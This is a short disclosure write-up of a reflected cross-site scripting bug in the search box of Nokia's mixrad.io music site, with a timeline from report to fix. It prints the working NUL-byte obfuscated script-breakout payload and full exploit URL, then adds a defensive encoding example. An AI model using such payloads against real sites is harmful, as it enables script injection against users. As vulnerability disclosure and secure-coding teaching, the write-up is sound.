Reflected XSS in music.nokia.com (mixrad.io)

My first valid XSS bug submission to Nokia was a textbook example of a reflected Cross-Site Scripting vulnerability.

It was enough to abuse the “Search” box with the payload below, although it worked only in Internet Explorer:

</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>

After visiting the following URL, the JavaScript code was executed:

http://www.mixrad.io/pl/pl/search/?domain=music&q=</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>
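The sketch below is an added example, not code from the post or from Nokia. It assumes the search term was echoed into an inline script block, which the leading </script> in the payload suggests but the post does not state. It compares quote-only escaping with an encoder that keeps the value inside the script element.

```javascript
// Added example; all function and variable names are hypothetical.

// Vulnerable: only quotes and backslashes are escaped. The HTML parser ends
// the script element at the first "</script", before the JavaScript parser
// ever sees the string literal, so the rest of q is parsed as markup.
function renderVulnerable(q) {
  const literal = "'" + q.replace(/\\/g, "\\\\").replace(/'/g, "\\'") + "'";
  return "<script>var searchTerm = " + literal + ";</script>";
}

// Hardened: JSON.stringify quotes the value and escapes control characters
// (including NUL) as \uXXXX; the replace() then escapes the characters the
// HTML parser or older JavaScript engines act on inside a script block.
function encodeForInlineScript(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0")
  );
}

function renderHardened(q) {
  return "<script>var searchTerm = " + encodeForInlineScript(q) + ";</script>";
}

// Number of script end tags the HTML parser would find in the output.
function countScriptEndTags(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// The q value from the post, decoded as the server would receive it.
const payload = decodeURIComponent(
  "</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>"
);

console.log(countScriptEndTags(renderVulnerable(payload))); // 3
console.log(countScriptEndTags(renderHardened(payload)));   // 1
console.log(renderHardened(payload));
```

With the hardened encoder the only script end tag left in the output is the template's own, and the browser-side variable still holds the exact string the user typed.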

Timeline:

[November 30th 2013] - bug was reported
[January 3rd 2014] - bug was fixed
